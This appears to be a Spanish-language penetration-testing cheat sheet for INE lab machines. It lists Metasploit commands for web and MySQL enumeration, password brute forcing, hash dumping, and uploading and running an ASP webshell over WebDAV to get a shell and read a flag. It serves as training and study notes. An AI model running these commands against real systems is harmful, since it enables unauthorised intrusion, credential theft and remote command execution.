Web Application Pentesting

Web Enumeration - Metasploit

Command
Description

use auxiliary/scanner/http/apache_userdir_enum

Enumerar userdir aparche

use auxiliary/scanner/http/brute_dirs

Enumerar directorios

auxiliary/scanner/http/dir_scanner

Enumerar directorios - P2

auxiliary/scanner/http/http_version

Versión del Apache

auxiliary/scanner/http/robots_txt

Ver el robots.txt

auxiliary/scanner/http/http_header

Ver la respuesta del header

auxiliary/scanner/http/files_dir

set RHOSTS victim-1

set VERBOSE false

run

Ver archivos en un directorio

auxiliary/scanner/http/http_put

set RHOSTS victim-1

set PATH /data

set FILENAME test.txt

set FILEDATA "Welcome To AttackDefense"

run

Ver si se puede subir un archivo

use auxiliary/scanner/http/http_put

set RHOSTS victim-1

set PATH /data

set FILENAME test.txt

set ACTION DELETE

run

Eliminar un archivo

auxiliary/scanner/http/http_login

set RHOSTS victim-1

set AUTH_URI /secure/

set VERBOSE false

run

Intentar hacer login

auxiliary/scanner/http/apache_userdir_enum

set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

set RHOSTS victim-1

set VERBOSE false

run

Enumerar usuarios apache

MySQL - Metasploit

Command
Description

auxiliary/scanner/mysql/mysql_version

Ver la versión

use auxiliary/scanner/mysql/mysql_login

set RHOSTS demo.ine.local

set USERNAME root

set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

set VERBOSE false

run

Login con fuerza bruta

use auxiliary/admin/mysql/mysql_enum

set USERNAME root

set PASSWORD twinkle

set RHOSTS demo.ine.local

run

Listar MySQL

use auxiliary/admin/mysql/mysql_sql

set USERNAME root

set PASSWORD twinkle

set RHOSTS demo.ine.local

run

Listar Linux que corre MySQL

use auxiliary/scanner/mysql/mysql_file_enum

set USERNAME root

set PASSWORD twinkle

set RHOSTS demo.ine.local

set FILE_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt

set VERBOSE true

run

Listar archivos

use auxiliary/scanner/mysql/mysql_hashdump

set USERNAME root

set PASSWORD twinkle

set RHOSTS demo.ine.local

run

Obtener todos los hashes

use auxiliary/scanner/mysql/mysql_schemadump

set USERNAME root

set PASSWORD twinkle

set RHOSTS demo.ine.local

run

Conocer nombres de tablas

use auxiliary/scanner/mysql/mysql_writable_dirs

set RHOSTS demo.ine.local

set USERNAME root

set PASSWORD twinkle

set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt

run

Ver qué directorios se pueden modificar

WebDAV - DavTest

Command
Description

nmap --script http-enum -sV -p80 demo.ine.local

Enumerar directorios

davtest -url http://demo.ine.local/webdav

Correr DavTEST

davtest -auth bob:password_123321 -url http://demo.ine.local/webdav

Correr DavTEST con credenciales

WebDAV - Cadaver

Command
Description

cadaver http://demo.ine.local/webdav

Conectarse

Subir el archivo (sabemos cual subir con davtest)

put /usr/share/webshells/asp/webshell.asp

ls

Entrar al archivo

demo.ine.local/webdav/webshell.asp

Ejecutar comandos

whoami: http://demo.ine.local/webdav/webshell.asp?cmd=whoami

Ver contenido C:\: http://demo.ine.local/webdav/webshell.asp?cmd=dir+C%3A%5C

Leer la flag:

http://demo.ine.local/webdav/webshell.asp?cmd=type+C%3A%5Cflag.txt

Crear una shell

WebDAV - Metasploit

Command
Description

msfconsole -q

use exploit/windows/iis/iis_webdav_upload_asp

set RHOSTS demo.ine.local

set HttpUsername bob

set HttpPassword password_123321

set PATH /webdav/metasploit%RAND%.asp

exploit

shell

Con DavTest vemos la URL, que archivos se pueden subir... La única diferencia es que acá usamos metasploit en vez de Cadaver

PreviousMost used toolsNextMost used tools

Last updated